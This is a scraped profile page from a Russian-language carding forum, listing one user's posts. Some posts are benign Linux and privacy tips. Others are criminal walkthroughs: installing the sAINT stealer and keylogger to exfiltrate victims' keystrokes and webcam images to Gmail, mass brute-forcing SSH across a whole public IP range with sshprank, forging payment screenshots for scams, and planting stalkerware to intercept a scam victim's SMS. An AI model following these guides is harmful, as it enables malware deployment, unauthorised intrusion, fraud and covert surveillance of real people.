Официальные зеркала форума: CVV.CASH Изображение & CVV.CLUB Изображение

Перейти к содержимому

 


           

       
Добро пожаловать на CVV.LI - открытое кардинг комьюнити.
У нас Вы сможете найти огромное множество статей по теме кардинга и теневого бизнеса. Актуальная информация, сервисы от проверенных селлеров, эксклюзивные схемы заработка - все это Вы найдете на нашем форуме! Не пренебрегайте услугами Гарант-Сервиса это убережет Вас от мошенников. Обратите внимание, звание модератора не является гарантом в сделках! Войдите или Зарегистрируйтесь!

Download_Link

Download_Link

Регистрация: 07 июл 2020
Online Активность: Сегодня, 14:37
****-

#90954 Galileo: Инструмент для пентеста в termux

Написано Download_Link 01 Май 2021 - 13:15

Galileo - это инструмент тестирования на проникновение с открытым исходным кодом для веб-приложений, который помогает разработчикам и тестерам на проникновение выявлять и использовать уязвимости в своих веб-приложениях.

Прошу обратить внимание! Автор данной статьи не несёт ответственности за любые последствия вслед использования предоставленной информации. Все материалы опубликованы исключительно в образовательных целях!

Установка:

Обновимся

apt update
apt upgrade
Далее устанавливаем необходимые нам пакеты: GIT и Python2.
apt install git -y
apt install python2 -y
Далее
git clone https://github.com/cclauss/Galileo
cd Galileo/
pip2 install -r requirements.txt
chmod +x galileo.py
python2 galileo.py
apt-get install python-pysocks
Перед началом работы мы вводим команду help, а для подробной информации о модулях:
show modules
Получаем
Show modules:
galileo #> show modules

Bruteforce
----------
bruteforce/auth_brute
bruteforce/backup_brute
bruteforce/file_dir_brute

Disclosure
----------
disclosure/code
disclosure/creditcard
disclosure/email
disclosure/privateip

Exploits
--------
exploits/shellshock

Fingerprint
-----------
fingerprint/cms
fingerprint/framework
fingerprint/server

Injection
---------
injection/os_command_injection
injection/sql_injection

Scanner
-------
scanner/asp_trace

Tools
-----
tools/socket

 

Вот перевод всех команд:
> show modules - смотрим, какой модуль будем использовать
> use название_модуля , который выбрали
> show options - смотрим опции, которыми располагает выбранный модуль
> set HOST IP_цели ,или URL (заполняем требуемые параметры )
> run - запуск выбранного модуля
Результаты должны отображаться в терминале.
Теперь давайте посмотрим на пример работы данного скрипта:
Мы будем искать email и cms на тестируемых целях:

0670e80faf63c3106762e.jpg


3995b098cfb2e1a7231f2.jpg

В целом, инструмент хороший, конечно требуются некоторые подработки, но использовать его можно, ведь это даже уже не OSINT а какой-то фреймворк.


  • 1


#89413 Linux песочницы. Тестирование исполняемых файлов

Написано Download_Link 15 Апрель 2021 - 21:42

Linux особенности песочниц

 

Основная проблема с изолированной программной средой Linux для анализа приложений - это ограниченная поддержка процессоров, на которых работает операционная система. Потому что использование вашей собственной физической машины для каждой архитектуры очень дорого. Как виртуализированные решения, такие как Hyper-V, VMWare или VBox, используются в качестве компромисса. Эти решения работают достаточно хорошо, но допускают виртуализацию только на архитектуре, на которой работает основной хост.

 

Cuckoo Sandbox

 

Абсолютным лидером среди бесплатных автоматизированных песочниц долгое время была песочница Cuckoo. Эта песочница позволяет настроить любую популярную платформу запуска приложений. Песочница оснащена веб-интерфейсом, через который можно управлять песочницей и вызывать результаты приложения. Архитектура этой песочницы позволяет вам писать собственные плагины, которые могут изменять свойства и поведение песочницы в зависимости от выполняемого файла или установленных дополнительных настроек. Общая схема архитектуры показана ниже:

f760896a2470ed811b8bf50e635f85de.png

Эта песочница очень популярна для анализа вредоносного программного обеспечения для ОС Windows. Разработчики утверждают, что она так же может работать и с ОС Linux. Разница только будет заключаться в том, что вместо виртуальной машины на Windows, должна быть настроена виртуальная машина на Linux. Попробуем найти еще аналоги.

 

LiSA Sandbox

 

Opensource песочница для анализа кода под ОС Linux. Найти репозиторий песочницы можно тут. Документация гласит, что эта песочница может анализировать исполняемые файлы с платформ:

 

  • x86_64
  • i386
  • arm
  • mips
  • aarch64

Подобная эмуляция возможна из-за использования эмулятора Qemu. Также песочница предлагает статический и динамический анализ исполняемого файла. Статический анализ производится за счёт инструмента radare2, а динамический за счет специального расширения ядра, которое собирает события взаимодействия с ОС: файловые операции, сетевые взаимодействия, запуск команд и процессов. В документации описывается, что поддержка такого большого количества процессоров позволяет работать с прошивками устройств. То есть можно просмотреть что выполняет программное обеспечение, которое будет записано на IoT устройства. Весьма полезная фича, учитывая, что вредоносы могут быть записаны в образ прошивки устройств и работать там на постоянной основе.

Из особенностей — использование контейнеров Docker. Это качественно ускоряет настройку песочницы. Интерфейс песочницы:

a2dc5bf5f7a9315655c9828900f724a5.png

 

Limon Sandbox

 

Относительно простой набор скриптов, который используется для анализа приложений. Не имеет возможностей для расширения.(Кроме написания новой логики). Может анализировать приложения теоретически на любом процессоре, так как полностью функционал записан на Python. Найти репозиторий можно здесь. Песочница оперирует следующими инструментами:

 

  • Yara
  • ssdeep
  • ldd
  • strace
  • Inetsim
  • tcpdump
  • volatility
  • sysdig

Похоже, что данная песочница это просто автоматизированная часть работы аналитика вредоносного программного обеспечения. Вывод скриптов можно увидеть ниже:

b58661a5871b69fa5425c58d5e441962.png

drakvuf Sandbox

Найти репозиторий можно тут. Единственный набор инструментов, который не направлен специально на исследование вредоносного кода. Этот набор используется для изучения программного обеспечения в целом. Записываемые артефакты выполнения приложений настолько подробны, что можно анализировать и вредоносное программное обеспечение. Документация гласит, что этот набор инструментов может работать практически со всеми популярными ОС. Единственное условие, которое нужно выполнить на устройстве - вложенная виртуализация. Все действия песочницы реализуются за счет перехвата системных функций ОС, которая используется в качестве хостовой для исследуемого приложения. К сожалению, для просмотра данных песочницы необходимо самостоятельно парсить данные из json.

 

Detux

 

Репозиторий песочницы можно найти здесь. Песочница для анализа вредоносного кода. Умеет анализировать следующие архитектуры:

 

  • х86
  • х86_64
  • ARM
  • MIPS
  • MIPSEL

В качестве базового гипервизора используется проект Qemu. Песочница автоматически собирает трафик и идентификаторы компрометации. Вся информация помещается в отчет. В отличии от аналогов не предоставляет красивого интерфейса, а записывает всё в отчет в формате json.

Как видно из списка выше, выбор хоть и небольшой среди песочниц все-таки есть. Однако, набор инструментов практически везде одинаковый:

  • radare2
  • Volatility
  • Yara
  • кастомный перехватчик для системных вызовов.

  • 1


#87498 Контейнеры в Firefox

Написано Download_Link 30 Март 2021 - 17:31

Вопрос приватности - один из наиболее острых в 21-м веке. Современные методы отслеживания пользователей в сети позволяют рекламным сервисам отслеживать перемещения пользователей между веб-сайтами и, на основе собранных данных, показывать навязчивую рекламу.

У разработчиков Firefox есть расширение (https://addons.mozil..._content=search), которое позволяет открывать сайты в изолированных друг от друга средах - контейнерах. Вы можете создать контейнеры для различных целей - будь то учёба, работа или личные интересы. Сайты, открытые в контейнерах, имеют собственные хранилища для файлов cookie, кэша и других данных, что усложнит отслеживание вас рекламными сетями и сервисами аналитики.

Помимо этого, контейнеры позволяют открывать несколько копий одного сайта с разными аккаунтами. Например, вы можете открыть одновременно несколько аккаунтов в социальной сети или несколько почтовых ящиков. Также можно указать контейнер, в котором всегда будет открываться определённые сайты. Например контейнер «Социальные сети», в котором будет открываться Facebook и Вконтакте.

Про похожее расширение для Chrome мы уже писали (https://t.me/exploitex/1991).


  • 1


#87179 Как понять, что вас взломали, и что в этой ситуации следует делать

Написано Download_Link 28 Март 2021 - 13:41

Всем нам хочется думать, что мы не станем жертвами социальной инженерии или других видов кибератак, но истина заключается в том, что даже умные и осторожные люди способны проиграть в борьбе с онлайн-мошенничеством.

Понять, что вы были взломаны, - это задача не из легких. Вы можете подождать, пока факт взлома станет явным, но к тому моменту вы уже потеряете драгоценный контроль над своими учетными записями, а иногда и деньгами.

В этой статье поговорим о том, что нужно делать, если у вас есть подозрения, что к вашей учетной записи получил доступ кто-то другой.

 


  • -1


#85625 Устанавливаем платные игры IOS

Написано Download_Link 15 Март 2021 - 22:48

Знаю способ проще - купи игру которая нужна за пару баксов и всё 

гайд для тех у кого нет пары баксов)


  • 1


#84934 есть идеи?

Написано Download_Link 10 Март 2021 - 17:29

продавать поддельные советы по подкупке

Врать что обеспечишь 100 баллов на егэ)


  • 2


#82776 sshprank: "Брут" SSH-соединений

Написано Download_Link 21 Февраль 2021 - 18:19

SSH (Secure Shell) — сетевой протокол прикладного уровня, позволяющий производить удалённое управление операционной системой и туннелирование TCP-соединений (например, для передачи файлов). Данный протокол схож по функциональности с протоколами Telnet и rlogin, но, в отличие от них, шифрует весь трафик, включая и передаваемые пароли.
SSH позволяет безопасно передавать в незащищённой среде практически любой другой сетевой протокол. Таким образом, можно не только удаленно работать на компьютере через командную оболочку, но и передавать по шифрованному каналу звуковой поток или видео.

В данной статье мы разберемся, как просканировать получить доступ к большому количеству SSH-серверов с помощью программы sshprank. Программа производит поиск компьютеров с работающим SSH-соединением и пытается получить доступ, используя метод перебора.
 

Установка и эксплуатация

Открываем терминал Kali linux и выполняем обновление пакетов:

apt-get update && apt-get upgrade

 

Устанавливаем git и python:

sudo apt-get install git python3-pip

 

Клонируем инструмент с репозитория GitHub:

git clone https://github.com/noptrix/sshprank

 

Переходим в директорию инструмента:

cd sshprank

 

Устанавливаем все необходимые зависимости с помощью команды:

sudo pip3 install -r docs/requirements.txt

 

Теперь нам нужно создать список хостов, к которым мы будем пытаться подключиться по SSH-соединению. Для этого вводим команду:

echo -e 109.22.{0..255}.{0..255}"\n" | sed 's/ //' > council.txt

 

В фигурных скобках обозначен диапазон значений, которые будут сохранены текстовый файл под названием council.txt. К слову, вместо вышеперечисленного диапазона Вы можете задать свой.
После того, как мы создали файл с хостами, вводим команду команду:

sshprank -l council.txt -U lists/user.txt -P lists/pws.txt -v

 

Данная команда запустит процесс перебора для подключения по SSH-соединению к хостам (council.txt), используя базу логинов (lists/user.txt) и паролей (lists/pws.txt). Вместо стандартных словарей рекомендуется использовать более мощные, поскольку это увеличит эффективность.


  • 1


#81977 Программа SpiderMail для массовой рассылки E-mail.

Написано Download_Link 15 Февраль 2021 - 19:50

Да фигня твой SpiderMail. Видали и лучше
  • -1


#81001 Бесплатная халява только у меня

Написано Download_Link 08 Февраль 2021 - 14:14

Удалите кто-нибудь этого ставочника


  • -1


#79053 Красивые иконки в linux

Написано Download_Link 19 Январь 2021 - 17:36

S Icons это небольшой набор красивых иконок, включающий иконки для различного типа папок, иконки для популярных типов файлов, иконки для некоторых приложений, а также для элементов интерфейса системы. Иконки очень стильные и позволят освежить «дефолтный» интерфейс. Рассмотрим, как выполнить установку этих иконок в Ubuntu Linux.

 

 Установка иконок из репозитория

 

Иконки можно установить, используя PPA репозиторий. Чтобы установить иконки, выполните в терминале следующие команды:

sudo add-apt-repository ppa:kroq-gar78/ppa
sudo apt-get update
sudo apt-get install fs-icons-ubuntu fs-icons-ubuntu-mono-dark fs-icons-ubuntu-mono-light

 

Как вы можете видеть, последняя команда устанавливает на самом деле три темы иконок. Одну базовую (основную) и две для темной (dark) и светлой (light) темы Ubuntu. В двух последних темах нет некоторых иконок (например, для элементов панели Gnome), которые есть в базовой, поэтому советую сначала посмотреть на базовую тему

 

Теперь мы должны сменить текущую тему иконок на новую FS Icons

.

Установка (смена) темы иконок в Ubuntu (Gnome)

 

Если вы используете классический Gnome, тогда сменить тему иконок очень просто. Для этого выберите пункт меню Система->Параметры->Внешний вид.

ubuntu-10.10-run-view-settings.png

Запуск настроек Внешнего вида в Gnome

 

Откроется окно для настроек внешнего вида Gnome. Вы должны находиться на вкладке Тема и нажать кнопку Настроить. Откроется окно настройки темы. В нем выберите вкладку Значки и в списке выберите FS Icons Ubuntu.

ubuntu-10.10-select-icon-theme.png

Параметры внешнего вида Gnome Установка (смена) темы иконок в Ubuntu 11.10 (Unity)

В Ubuntu 11.10 в интерфейсе Unity нет возможности сменить тему иконок базовыми средствами системы, поэтому можно воспользоваться программой Gnome Tweak Tool, которая позволяет выбрать тему иконок. Сначала установите сам Gnome Tweak Tool командой:

sudo apt-get install gnome-tweak-tool

 

Запустите утилиту, выполнив:

gnome-tweak-tool

 

Перейдите на вкладку Тема и в списке Тема значков выберите пункт Fs-icons-ubuntu. Иконки (значки) будут заменены сразу же без перезагрузки.

gnome-tweak-tool-set-icon-theme.png

Смена темы иконок в Gnome Tweak Tool

 

 


  • 1


#77563 Kitty – мощный эмулятор терминала на базе графического процессора

Написано Download_Link 01 Январь 2021 - 12:14

Написанный на Python и Objective C, Kitty – это кроссплатформенный и многофункциональный эмулятор терминала на базе графического процессора, разработанный по лицензии GPL 3.0.

Он поддерживает графику, изображения, Unicode, истинный цвет, протокол мыши, гиперссылки, несколько буферов копирования/вставки и т. д.

Это легкий эмулятор, которым можно управлять из скриптов, приглашения оболочки и через SSH.

Подобно tilix, kitty представляет собой многофункциональный эмулятор терминала.

В этом руководстве показано, как установить Kitty на Ubuntu 20.04 и мы увидим основные принципы его использования.

 

Установка Kitty

 

Вы можете установить исходный код, а также использовать официальный репозиторий Ubuntu.

Вы можете использовать любой из способов установки.

 

Метод 1: из репозитория Ubuntu

 

Сначала откройте терминал и обновите свою систему.

$ sudo apt update

 

Используйте apt для установки Kitty:

$ sudo apt install kitty -y
Просто введите “kitty”, чтобы открыть его.
$ kitty

 

Метод 2: из готовых бинарных файлов

 

Если у вас Mac или другой Linux, просто установите предварительно созданные бинарники Kitty.

Используйте следующую команду curl:

$ curl -L https://sw.kovidgoyal.net/kitty/installer.sh | sh /dev/stdin
Система установит бинарник в каталог ~/.local/kitty.app/bin/.

 

Вы можете просто запустить его, набрав:

$ ~/.local/kitty.app/bin/kitty

 

Вы также можете запустить kitty, выполнив поиск в приложениях.

 

 

Метод 3: установить Kitty из исходников

 

Еще один удобный способ установить Kitty – скомпилировать его из исходников.

Однако потребуются некоторые зависимости, и прежде чем продолжить, убедитесь, что у вас есть следующее:

  • python 3.5 или новее
  • harfbuzz 1.5.0 или новее
  • zlib
  • libpng
  • liblcms2
  • gcc

Исходный код размещен на Github, поэтому клонируйте репозиторий Git, как показано далее:

$ git clone https://github.com/kovidgoyal/kitty
После загрузки перейдите в каталог и выполните следующие команды.
$ cd kitty
Затем вызовите:
$ make
После установки вы можете запустить его, вызвав команду:
$./kitty/launcher/kitty

 

Как использовать Kitty

 

Kitty может запускать несколько программ в нескольких окнах.

Вы можете сделать это, нажав клавиши ctrl + shift + enter.

Чтобы сделать программу продвинутой, у kitty есть фреймворк, известный как kittens.

Вы можете отображать изображения, используя его.


  • 1


#76933 Бесплатные фейк скрины оплаты, бот

Написано Download_Link 26 Декабрь 2020 - 12:20

При оплате/споре нас почти всегда просят показать доказательства - ими являются скриншоты.

В этой статье мы научимся их подделывать.

Генерация скриншотов Qiwi, ЮMoney, 1XBet:

1. Заходим на сайт https://dealacc.ru/
2. Выбираем нужный нам скриншот и жмыкаем "Создать".
3. Вписываем нужные данные и нажимаем сохранить.

Генератор всего (Instagram, Twitter, TikTok, Youtube посты/каналы):

1. Заходим на сайт https://fakedetail.com/
2. Выбираем нужную нам функцию и жмыкаем по ней.
3. Сохраняем готовую картинку.


  • 1


#76830 Пишем свой стиллер

Написано Download_Link 25 Декабрь 2020 - 14:05

Всем привет! Сегодня мы затронем с вами тему стиллера.

 

Стиллер - одно из лучших решений социального инженера. Не нужно возиться со ссылками, уговорами, а если склеить стиллер и другую прогу, и опубликовать в инет - делать не придется вообще ничего.

 

 

sAINT - простая утилита, стиллер, который многие антивирусы не распознают. (Учитывая Windows-Халтурщик и даже Bitdefender с ОНЛАЙН ЗАЩИТОЙ)

Открываем терминал Kali, и копипастим данные строки (ожидай что установка займет до 10 минут в зависимости от твоей прошивки):

apt update
sudo apt-get install maven
apt install maven default-jdk default-jre openjdk-8-jdk openjdk-8-jre zlib1g-dev libncurses5-dev lib32z1 lib32ncurses5 -y - Если возникла ошибка - игнорируй ее
git clone https://github.com/tiagorlampert/sAINT
cd sAINT
chmod +x configure.sh
./configure.sh
java -jar sAINT.jar

Для того что бы данные программы отправлялись, используй почту Gmail, на других сервисах она не работает. Интерфейс программы интуитивный, есть возможность вбить в твой стиллер keylogger, сделать фотку вебки и скрин с устройства жертвы.

 

Советы:

 

Настрой отправку для keylogger'а от 500 символов, а лучше 1000, таким образом после 1000 символов сделанных жертвой, тебе будет отправлено письмо, и ты не получишь слишком много спама.

 

ВАЖНО

 

Для корректной работы у жертвы должен быть установлен Java, иначе данные могут не отправиться. Однако учитывая что Java на большинстве устройств стоит изначально, тебе не о чем беспокоиться.

 

Для того что бы данные программы отправлялись, используй почту Gmail, на других сервисах она не работает. Интерфейс программы интуитивный, есть возможность вбить в твой стиллер keylogger, сделать фотку вебки и скрин с устройства жертвы.

 

Настрой отправку для keylogger'а от 500 символов, а лучше 1000, таким образом после 1000 символов сделанных жертвой, тебе будет отправлено письмо, и ты не получишь слишком много спама.


 


  • 1


#75949 Перехват смс

Написано Download_Link 18 Декабрь 2020 - 11:05

Перехват чужих SMS Чтобы получить доступ к чужим сообщениям, нужно воспользоваться специальными приложениями. Таких программ довольно много, но у всех общий принцип работы. 1)Вы устанавливаете программу на телефон абонента, сообщения которого хотите прочитать, а также на свое устройство. 2)Софт будет перехватывать SMS сообщения с телефона и передавать их на второе устройство, позволяя вам прочитывать их. Примеры программ для перехвата:

 

TalkLog Суть этой программы проста: вы устанавливаете её на телефон абонента, а сами заходите на сайт сервиса, куда и будут отправляться сообщения. Помимо чтения смс, она даёт доступ к истории мобильного браузера человека, позволяет видеть, какие приложения он устанавливает и удаляет, когда телефон подключается к зарядке, включается и выключается.

 

FlexiSPY Позволяет читать смс и многое другое. С помощью этой шпионской программы пользователь сможет следить за абонентом с помощью фронтальной камеры его телефона, прослушивать устройство, смотреть медиа, установленное на телефон абонента, узнавать его местоположение.

 

SMSTrap Аналогичная программа, схожая с упомянутыми выше. Её отличительной особенностью можно считать только то, что она работает даже в условиях роуминга, то есть, когда абонент находится в другой стране. Думаю несложно убедить мамонта, что ему необходимо установить одно из предложенных приложений.


  • 1


#75105 Взламываем архив с паролем

Написано Download_Link 12 Декабрь 2020 - 18:26

Для этого мы будем использовать утилиту ZIP-Password-BruteForcer. Она написана на ЯП Python, поэтому она может работать как на Windows, так и на Linux.

 
Установка
git clone https://github.com/The404Hacking/ZIP-Password-BruteForcer

 

Использование

Переходим в директорию и запускаем:

ZIP-Password-BruteForcer
python ZIP-Password-BruteForcer.py

Для запуска атаки перебором нужно прописать 1. Далее вводим путь к зашифрованному zip архиву и словарю. Процесс запуститься и в зависимости от мощности процессора скорость может достигать 150 вариаций в секунду.


 


  • 1




Привет, новичок! Твои права на форуме ограничены! Зарегистрируйся или Войди на форум, чтобы снять ограничение.